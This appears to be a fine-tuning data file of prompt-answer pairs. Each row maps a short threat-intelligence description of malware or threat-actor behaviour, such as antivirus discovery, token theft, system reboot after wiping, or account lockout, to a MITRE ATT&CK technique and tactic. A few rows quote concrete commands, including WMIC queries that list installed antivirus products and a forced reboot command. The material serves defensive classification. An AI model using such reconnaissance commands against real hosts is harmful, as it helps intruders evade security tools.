+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy uses a loader DLL file to collect AV product names from an infected host.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used the Windows service winmgmts:\\.\root\SecurityCenter2 to check installed antivirus products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used tools to search victim systems for security products such as antivirus and firewall software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for security products on infected machines.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat can determine is Kaspersky software is running on an endpoint by running `cmd /c wmic process where name=""avp.exe""`.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper can search for anti-virus software running on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to identify the installed anti-virus product on the compromised host.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has checked for a variety of antivirus products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth checks for the presence of Avast antivirus in the C:\Program\Files\ folder.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer has the ability to collect information about installed AV products from an infected host.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to identify installed anti-virus products on a compromised host.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect a list of anti-virus products installed on a machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch uses WMI to enumerate installed security products in the victim’s environment.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can identify the installed antivirus engine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can detect EDR userland hooks.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can identify specific analytical tools based on running processes.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK checks for antivirus and forensics software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has queried the infected system's registry searching for specific registry keys associated with antivirus products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can search for processes with antivirus and antimalware product names.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie attempts to detect several anti-virus products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has checked for the presence of ""Little Snitch"", macOS network monitoring and application firewall software, stopping and exiting if it is found.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to collect information about anti-virus software on the victim.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate looks for various security products by process name using hard-coded values in the malware. DarkGate will not execute its keylogging thread if a process name associated with Trend Micro anti-virus is identified, or if runtime checks identify the presence of Kaspersky anti-virus. DarkGate will initiate a new thread if certain security products are identified on the victim, and recreate any malicious files associated with it if it determines they were removed by security software in a new system location.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can check for the Kaspersky Anti-Virus suite.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can search for anti-virus products on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky checks for the existence of anti-virus.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can search for anti-virus products on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can enumerate antivirus software on the target.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has been observed querying installed antivirus software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT checks for installed security software like antivirus and firewall.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Felismus checks for processes associated with anti-virus vendors.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious has checked for AV software as part of its persistence process.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher probes the system to check for antimalware processes.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame identifies security software such as antivirus through the Security module.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy will attempt to detect anti-virus products during the initial infection.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can identify the processes for Bkav antivirus.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can check for the presence of specific security products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon checks for anti-malware products and processes.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to identify any anti-virus installed on the infected system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke has the ability to check for the presence of Kaspersky security software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can identify installed AV software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can search for processes associated with an anti-virus product from list.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can search for a variety of security software programs, EDR systems, and malware analysis tools.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo collects a list of installed antivirus software from the victim’s system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor has the ability to search for Kaspersky Antivirus on a victim's machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can list installed security products in the victim’s environment.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can use WMI commands to check the system for firewall and antivirus software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs can obtain information on installed anti-malware programs.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito's installer searches the Registry and system to see if specific antivirus tools are installed on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can detect and terminate active security software-related processes on infected systems.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya determines if specific antivirus programs are running on an infected host machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has detected security tools.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect information on the victim's anti-virus software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can gather AVs registered in the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate AWS security services, including WAF rules and GuardDuty detectors.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can check for the presence of ESET and Kaspersky security software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A module in Prikormka collects information from the victim about installed anti-virus software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can identify the installed antivirus product on a targeted system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can obtain information about security software on the victim.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec has a plugin detect security products via active drivers.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin enumerates running processes to search for Wireshark and Windows Sysinternals suite.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to check if /usr/sbin/setenforce exists. This file controls what mode SELinux is in.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can check for the presence of 29 different antivirus tools.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill can check for antivirus and antimalware programs.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to scan for security tools such as firewalls and antivirus tools.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can identify if ESET or BitDefender antivirus are installed before dropping its payload.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet enumerates the currently running processes related to a variety of security products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 performs checks for various antivirus and security products during installation.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tasklist can be used to enumerate security software currently running on a system by process name of known products.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses the kill_unwanted function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN uses WMI to check for anti-virus software installed on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can determine if a compromised host has security products installed.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can find the presence of a specific security software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can recognize the presence of monitoring tools on a target system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird checks for the presence of Bitdefender security software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can detect Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos antivirus programs.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET searches firewall configuration files located in /Library/Preferences/ and uses csrutil status to determine if System Integrity Protection is enabled.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH checks for antimalware solution processes on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ can search a compromised host to determine if it is running Windows Defender or Kasperky antivirus.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to detect if the infected host is running an anti-virus process.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to detect anti-virus products and processes on a compromised host.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: netsh can be used to discover system firewall settings.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has checked for the existence of Kaspersky antivirus software on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.","Tecnique: T1526 Cloud Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate AWS services, such as CloudTrail and CloudWatch.","Tecnique: T1526 Cloud Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools can enumerate Azure AD applications and service principals.,"Tecnique: T1526 Cloud Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as ""Google Defender"" ""Google Email Protection,"" and ""Google Scanner"" for Gmail users. They also targeted Yahoo users with applications masquerading as ""Delivery Service"" and ""McAfee Email Protection"".","Tecnique: T1528 Steal Application Access Token, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 uses stolen tokens to access victim accounts, without needing a password.","Tecnique: T1528 Steal Application Access Token, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can steal users’ access tokens via phishing emails containing malicious links.,"Tecnique: T1528 Steal Application Access Token, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates gathers Kubernetes service account tokens using a variety of techniques.,"Tecnique: T1528 Steal Application Access Token, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used malware that will issue the command shutdown /r /t 1 to reboot a system after wiping its MBR.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.","Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AcidRain reboots the target system once the various wiping processes are complete.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker’s Linux variant has terminated ESXi virtual machines.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has a function to sleep for two hours before rebooting the system.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can initiate a system shutdown.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk attempts to reboot the machine by terminating specific processes.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has been observed shutting down infected systems.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can shutdown and reboot the victim machine.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.","Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya will reboot the system one hour after infection.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer will shut down the compromised system after it is done modifying system configuration settings.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon will reboot the infected system once the wiping functionality has been completed.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.,"Tecnique: T1529 System Shutdown/Reboot, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider accessed victim OneDrive environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.","Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has obtained files from the victim's cloud storage instances.,"Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider enumerates data stored in cloud resources for collection and exfiltration purposes.,"Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can collect files from a user’s OneDrive.,"Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate and download files stored in AWS storage services, such as S3 buckets.","Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.,"Tecnique: T1530 Data from Cloud Storage, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira deletes administrator accounts in victim networks prior to encryption.,"Tecnique: T1531 Account Access Removal, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access.,"Tecnique: T1531 Account Access Removal, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has been observed changing account passwords and logging off current users.,"Tecnique: T1531 Account Access Removal, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has changed user account passwords and logged users off the system.,"Tecnique: T1531 Account Access Removal, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor has the ability to change the password of local users on compromised hosts and can log off users.,"Tecnique: T1531 Account Access Removal, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.","Tecnique: T1534 Internal Spearphishing, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.,"Tecnique: T1534 Internal Spearphishing, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.","Tecnique: T1534 Internal Spearphishing, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information.,"Tecnique: T1534 Internal Spearphishing, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.,"Tecnique: T1534 Internal Spearphishing, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider abused AWS Systems Manager Inventory to identify targets on the compromised network prior to lateral movement.,"Tecnique: T1538 Cloud Service Dashboard, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 stole Chrome browser cookies by copying the Chrome profile directories of targeted users.","Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
